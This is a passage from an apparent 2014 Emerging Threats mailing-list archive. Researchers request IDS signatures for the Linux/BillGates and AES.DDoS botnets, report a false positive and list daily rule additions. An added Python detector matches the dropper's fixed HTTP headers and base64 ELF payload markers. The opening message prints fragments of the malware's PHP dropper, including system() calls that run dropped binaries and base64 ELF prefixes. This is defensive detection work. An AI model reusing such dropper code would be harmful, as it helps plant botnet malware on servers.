class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'system("$V5lgt4awdv3b " . $Vdkqrxiiyr3t ."/$Vos03apkyec2");'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'system($Vdkqrxiiyr3t . "/$Vos03apkyec2");'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'system($Vdkqrxiiyr3t . 
"/$Vos03apkyec1");'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'exit(1);'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'}'</span><span class="">,</span><span class="">0Ah</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x04089D8</span><span class=""> &nbsp; db </span><span class="">'?&gt;'</span><span class="">,</span><span class="">0Ah</span><span class="">,</span><span class="">0</span><span class=""><br></span><span class="">.</span><span class="">rodata</span><span class="">:</span><span class="">0x0408CE9</span><span class=""> &nbsp; align </span><span class="">10h</span>
</div></div>
<br>
</div>Using the above (1) and (2), we can use the hard-coded HTTP header to be blocked by ET sigs.<br>
</div>Moreover, there is one more vector to use for filtering (below):<br><br>
</div>(3) The ELF file injected into the /tmp directory<br><br><div class=""><div class="">
&lt;?php
$bufferf = 'f0VMRgEBAQMAAAAAAAAAAAIAAwABAAA....foo....';
$bufferf2 = 'f0VMRgIBAQMAAAAAAAAAAAIAPgABAA....bar...';

</div></div>&uarr;the above "$bufferf =" and "$bufferf2 =" look like a good spot to filter. But only the new version is using this; the old version is using a different scheme (without PHP injection, but a PHP system command to wget the bins..)<br><br>
</div>
<div>If you need more confirmation, please do not hesitate to ask.<br>
</div>
<div>It would be nice if this threat can also be blocked.<br><br>
</div>
<div>Herewith I close the series of requests for ET sigs from MalwareMustDie, a total of 3 DDoS botnet signatures. Looking forward to the reply, with thanks in advance.<br><br>
</div>
<div>Best regards always/Rick<br><br>-- <br>Hendrik Adrian /  <at> unixfreaxjp<br>PGP/<a href="http://MIT.EDU">MIT.EDU</a>: RSA 2048/0xEC61AB9<br><a href="http://about.me/unixfreaxjp">http://about.me/unixfreaxjp</a><br><br>MalwareMustDie,NPO Research Group<br>Web <a href="http://malwaremustdie.org">http://malwaremustdie.org</a><br>Research blog: <a href="http://malwaremustdie.blogspot.com">http://malwaremustdie.blogspot.com</a><br>Wiki &amp; Code: <a href="http://code.google.com/p/malwaremustdie/">http://code.google.com/p/malwaremustdie/</a><br>Report Pastes: <a href="http://pastebin.com/u/MalwareMustDie">http://pastebin.com/u/MalwareMustDie</a><br><br>This email is confidential and may be legally privileged. It is intended<br>as a confidential communication only for the person(s) named above.<br>Any other use or disclosure is prohibited.<br>If you have received this message in error, please delete it, disregard its contents.<br>
</div>
</div></div>
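As an added example (not code from the message above or from MalwareMustDie), the following Python checks a raw HTTP request against the two fingerprints Rick points at: the fixed header block from the .rodata listing, and the `$bufferf = '...'` assignments in the body whose base64 begins with an ELF header. It also decodes the ELF class and machine, which shows that the two prefixes quoted in (3) are a 32-bit x86 and a 64-bit x86-64 image; the Host, request target, Content-Length, the benign control request and the machine-name table are assumptions constructed for the example.

```python
import base64
import re
import struct

# Fixed header values the dropper carries in .rodata (from the listing above).
BILLGATES_UA = "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0"
FIXED_HEADERS = {
    "user-agent": BILLGATES_UA,
    "content-type": "application/x-www-form-urlencoded",
    "connection": "close",
}
# Body marker: the PHP dropper assigns two base64 blobs to $bufferf and $bufferf2.
BUFFER_RE = re.compile(rb"\$bufferf(2?)\s*=\s*'([A-Za-z0-9+/=]+)';")
ELF_CLASS = {1: "ELF32", 2: "ELF64"}
ELF_MACHINE = {0x03: "x86", 0x08: "MIPS", 0x14: "PowerPC", 0x28: "ARM", 0x3E: "x86-64"}


def parse_request(raw):
    """Split a raw HTTP request into (request line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0].decode("latin-1"), headers, body


def identify_elf(b64):
    """Decode the start of a base64 blob and read ELF class, e_type and e_machine.
    Only whole 4-char groups are decoded, so the truncated prefixes quoted in (3)
    still give the 20 header bytes needed. Returns None if it is not an ELF image."""
    usable = b64[: len(b64) - len(b64) % 4]
    try:
        data = base64.b64decode(usable, validate=True)
    except ValueError:
        return None
    if len(data) < 20 or data[:4] != b"\x7fELF":
        return None
    endian = "<" if data[5] == 1 else ">"  # EI_DATA: 1 = little endian
    e_type, e_machine = struct.unpack(endian + "HH", data[16:20])
    return {
        "class": ELF_CLASS.get(data[4], "class %d" % data[4]),
        "machine": ELF_MACHINE.get(e_machine, "machine 0x%x" % e_machine),
        "type": e_type,  # 2 = ET_EXEC
    }


def inspect_request(raw):
    """Score one request against the dropper fingerprint: the fixed header block
    plus a body that assigns base64-encoded ELF images to $bufferf/$bufferf2."""
    request_line, headers, body = parse_request(raw)
    header_hits = sorted(k for k, v in FIXED_HEADERS.items() if headers.get(k) == v)
    payloads = {}
    for suffix, blob in BUFFER_RE.findall(body):
        payloads["$bufferf" + suffix.decode()] = identify_elf(blob)
    elf_seen = any(info is not None for info in payloads.values())
    return {
        "header_hits": header_hits,
        "payloads": payloads,
        "match": request_line.startswith("POST ") and len(header_hits) == 3 and elf_seen,
    }


# Constructed sample: the header block from the listing with its %s/%d placeholders
# filled in, and a body shaped like the PHP dropper carrying the two base64 prefixes
# quoted in (3). Host, request target and Content-Length are made up for the example.
SAMPLE_BODY = (
    b"<?php\n"
    b"$bufferf = 'f0VMRgEBAQMAAAAAAAAAAAIAAwABAAA';\n"
    b"$bufferf2 = 'f0VMRgIBAQMAAAAAAAAAAAIAPgABAA';\n"
    b"$Vdkqrxiiyr3t = sys_get_temp_dir();\n"
    b"?>\n"
)
SAMPLE_REQUEST = b"\r\n".join([
    b"POST / HTTP/1.1",
    b"Host: 192.0.2.10",
    b"User-Agent: " + BILLGATES_UA.encode(),
    b"Content-Type: application/x-www-form-urlencoded",
    b"Content-Length: %d" % len(SAMPLE_BODY),
    b"Connection: close",
    b"",
    SAMPLE_BODY,
])
# Constructed benign control: an ordinary form POST from a different browser build.
BENIGN_REQUEST = b"\r\n".join([
    b"POST /login HTTP/1.1",
    b"Host: 192.0.2.10",
    b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0",
    b"Content-Type: application/x-www-form-urlencoded",
    b"Content-Length: 16",
    b"Connection: close",
    b"",
    b"user=bob&pass=x1",
])
```

Run `inspect_request(SAMPLE_REQUEST)` to see all three header hits plus both payloads classified, and `inspect_request(BENIGN_REQUEST)` to see the control request fall through on the User-Agent and the missing body marker.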
Hendrik Adrian | 21 Sep 14:25 2014

Request #2 - ET signature for Linux/AES.DDoS

Hello ET friends,

Here is another request, for a blocking signature for a different
ELF DDoS threat malware I investigated, called Linux/AES.DDoS.
I made a dedicated repo for this threat too, here; feel free to
use it as reference:
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483

The complete initial connection to CNC was successfully recorded,
please see the attached images.
<attached 2 PNG files>

I will send the PCAP to the email addresses noted in the Cc.

The strings "VERSONEX", "Hacke\nr" and "INFO" are hard-coded in the
binary and can be used for sig purposes.
"Mbps" is also usable, but I recommend not to use it, since I saw versions
not using it (the PPC or MIPS version).
Please help to generate the signature accordingly, and feel free to
email me directly for more requests or questions.

Best regards

Rick of MalwareMustDie
Hendrik Adrian | 21 Sep 10:27 2014

A request for ELF "Linux/BillGates" DDoS'er ET Signature

Hello Will,

Cc: Matt, ET List

Allow me to request a blocking scheme for the ELF DDoS'er
"Linux/BillGates", as rapidly spotted in hacked servers and
routers; below is the PoC of the threat:
https://twitter.com/unixfreaxjp/status/513599384286531584
https://twitter.com/unixfreaxjp/status/513586918127173632
https://twitter.com/unixfreaxjp/status/513160603494391808
https://twitter.com/unixfreaxjp/status/512820029037879297
https://twitter.com/unixfreaxjp/status/512686082048004096
(these are only the data I gained from Sept 19th until now; there are
many more of these that I did not tweet)

We are in an effort to stop the CNC; so far we nuked more than 35 of
their panels, but there is still much more activity spotted according
to some netflow data I received.

The initial communication pattern during the callback could finally
be captured completely during one specific analysis of a case, which
will be useful for signature building, as per the attached picture.
<attached 2 PNG image files>
Hopefully the ET detection signature can be published accordingly.
Please kindly support.
The PCAP is a private possession, so it will be shared via direct
email, off-list.

Looking forward, with many thanks in advance.

Regards/Rick of MalwareMustDie

Duane Howard | 20 Sep 00:42 2014

FP on sid:2018005

I can provide pcap off-list, if needed:
Cert causing FP:

d <at> zr1:~$ openssl x509 -in cert.der -inform DER -text
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 0 (0x0)
    Signature Algorithm: md5WithRSAEncryption
        Issuer: C=cn, ST=fj, L=xm, O=cnc, OU=sw, CN=all/emailAddress=cdn-JPAHcpxnCtkqZrZ1v91DedBPR1lH4CV8@public.gmane.org
        Validity
            Not Before: Sep 14 07:34:42 2005 GMT
            Not After : Oct 14 07:34:42 2005 GMT
        Subject: C=cn, ST=fj, L=xm, O=cnc, OU=sw, CN=all/emailAddress=cdn-JPAHcpxnCtkqZrZ1v91DedBPR1lH4CV8@public.gmane.org
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (1024 bit)
                Modulus:
                    00:c2:04:6a:10:5c:ec:13:7d:1c:67:a1:89:db:d6:
                    6f:e2:9e:8e:ca:ea:a7:e4:8f:0d:d5:68:f6:a3:4e:
                    83:93:f2:36:4f:ef:c7:99:cb:56:bd:5f:ed:df:f0:
                    22:98:e6:1d:e9:a9:19:8d:7c:98:4b:44:4f:08:41:
                    08:90:4a:ed:ee:92:8a:6d:bb:7d:9f:23:e2:9f:9c:
                    6a:74:8e:00:30:c3:32:c6:a8:cd:1b:73:f0:87:06:
                    6c:5a:0c:24:9d:5e:7c:f6:09:cb:85:d9:28:9d:f9:
                    25:c4:fc:c8:d7:98:43:15:31:82:4e:d3:0d:f5:cb:
                    5e:27:a4:ab:2b:93:c8:0b:45
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Subject Key Identifier: 
                81:34:D7:72:CB:C5:44:7F:D4:7F:34:DD:A0:EA:BD:55:C7:76:5A:64
            X509v3 Authority Key Identifier: 
                keyid:81:34:D7:72:CB:C5:44:7F:D4:7F:34:DD:A0:EA:BD:55:C7:76:5A:64
                DirName:/C=cn/ST=fj/L=xm/O=cnc/OU=sw/CN=all/emailAddress=cdn-JPAHcpxnCtkqZrZ1v91DedBPR1lH4CV8@public.gmane.org
                serial:00

            X509v3 Basic Constraints: 
                CA:TRUE
    Signature Algorithm: md5WithRSAEncryption
         4f:95:50:6e:47:5b:22:18:a1:d4:c6:59:6f:8d:e5:f7:1e:0f:
         12:3c:a0:54:cb:cb:e2:80:b2:cf:22:ae:3f:7c:94:72:91:2c:
         6b:6b:c4:f2:97:1d:d4:01:5d:93:14:03:ff:53:a9:28:0a:0b:
         da:df:18:c0:ae:a5:fc:9e:2a:d8:51:58:68:ca:bf:d8:7f:d3:
         f9:d7:60:c3:9b:0f:4c:b5:04:90:b4:f2:d0:04:5b:d6:67:1d:
         52:6e:17:3e:e8:82:ae:89:0d:52:ce:0e:0f:37:8b:17:81:0c:
         31:1e:66:de:72:ec:09:c4:22:b6:78:61:a4:26:15:b2:83:85:
         c5:35

./d

Francis Trudeau | 20 Sep 00:11 2014

Daily Ruleset Update Summary 09/19/2014

 [***] Summary: [***]

 5 new Open signatures, 18 new Pro (5+13).  NewPosThings, Sefnit.R,
TROJANCLICKER.MSIL, UFONet DDoS activity.

 Thanks:  Jake Warren.

 [+++]          Added rules:          [+++]

 Open:

  2019197 - ET TROJAN NewPosThings Checkin (trojan.rules)
  2019198 - ET TROJAN NewPosThings Data Exfiltration (trojan.rules)
  2019199 - ET TROJAN NewPosThings POST with Fake UA and Accept Header (trojan.rules)
  2019200 - ET CURRENT_EVENTS Possible Dyre SSL Cert Sept 19 2014 (current_events.rules)
  2019201 - ET TROJAN Backdoor.Win32/PcClient.AA Checkin (trojan.rules)

 Pro:

  2808848 - ETPRO TROJAN Win32/Sefnit.R Checkin (trojan.rules)
  2808849 - ETPRO TROJAN Win32.CFPass.dcb Checkin (trojan.rules)
  2808850 - ETPRO TROJAN Troj/Buzus-CZ checkin (trojan.rules)
  2808851 - ETPRO TROJAN Win32/Spy.Rehtesyk.A Checkin 1 (trojan.rules)
  2808852 - ETPRO TROJAN Win32/Spy.Rehtesyk.A Checkin 2 (trojan.rules)
  2808853 - ETPRO TROJAN W32/Banker.GAJ!tr Checkin via SMTP (trojan.rules)
  2808854 - ETPRO TROJAN TROJANCLICKER.MSIL/EZBRO.A Checkin  (trojan.rules)
  2808855 - ETPRO TROJAN TROJANCLICKER.MSIL/EZBRO.A Keep-Alive (trojan.rules)
  2808856 - ETPRO WEB_SPECIFIC_APPS Possible UFONet DDoS Participation (web_specific_apps.rules)
  2808857 - ETPRO MOBILE_MALWARE Trojan-SMS.AndroidOS.FakeInst.a Checkin 5 (mobile_malware.rules)
  2808858 - ETPRO MOBILE_MALWARE Trojan-SMS.AndroidOS.FakeInst.a Response (mobile_malware.rules)
  2808859 - ETPRO TROJAN W32/Scribble-B CnC via IRC (trojan.rules)
  2808860 - ETPRO TROJAN Win32/Ramnit.A Checkin (trojan.rules)

 [///]     Modified active rules:     [///]

  2017505 - ET TROJAN Gh0st Trojan CnC 2 (trojan.rules)
  2806414 - ETPRO TROJAN FakeAV-BT Checkin (trojan.rules)
  2808721 - ETPRO MOBILE_MALWARE Android/Tekwon.A Checkin 2 (mobile_malware.rules)
